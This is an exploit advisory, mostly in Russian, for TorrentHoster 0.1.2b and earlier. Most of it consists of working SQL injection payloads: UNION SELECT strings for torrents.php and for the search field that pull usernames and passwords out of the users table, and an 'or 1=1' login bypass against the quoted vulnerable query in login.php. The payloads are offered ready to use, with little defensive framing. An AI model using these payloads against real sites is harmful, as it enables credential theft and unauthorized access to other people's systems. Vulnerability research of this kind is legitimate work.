TorrentHoster <= 0.1.2b SQL Injection

Dwonload TorrentHoster0.1.2b (http://scripts.ucoz.com/_ld/2/292_torrenthoster_0.rar)

[1]

файл torrents.php

Условие: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/torrents.php?mode=details&id=-1'+union+select+1,2,3,4,concat_ws(0x3a,userName,pa ssword),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +users/*

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.Уязвимость существует из-за недостаточной обработки входных данных в параметре $id в сценарии torrents.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

в поле Search Torrents вводим:

dok' union select 1,user(),3,version(),5,6,7,concat_ws(0x3a,userName ,password),9,10,11,12,13,14,15,16 from users/*

[2]

Обход авторизации

файл login.php

Vuln code:

$qid = db_query("
SELECT userName, password, privilege, email
FROM users
WHERE userName = '$username' AND password = '" . md5($password) . "'
");

Условие: magic_quotes_gpc = Off

Username: 1' or 1=1/*
Password: 1' or 1=1/*

(c) ~!Dok_tOR!~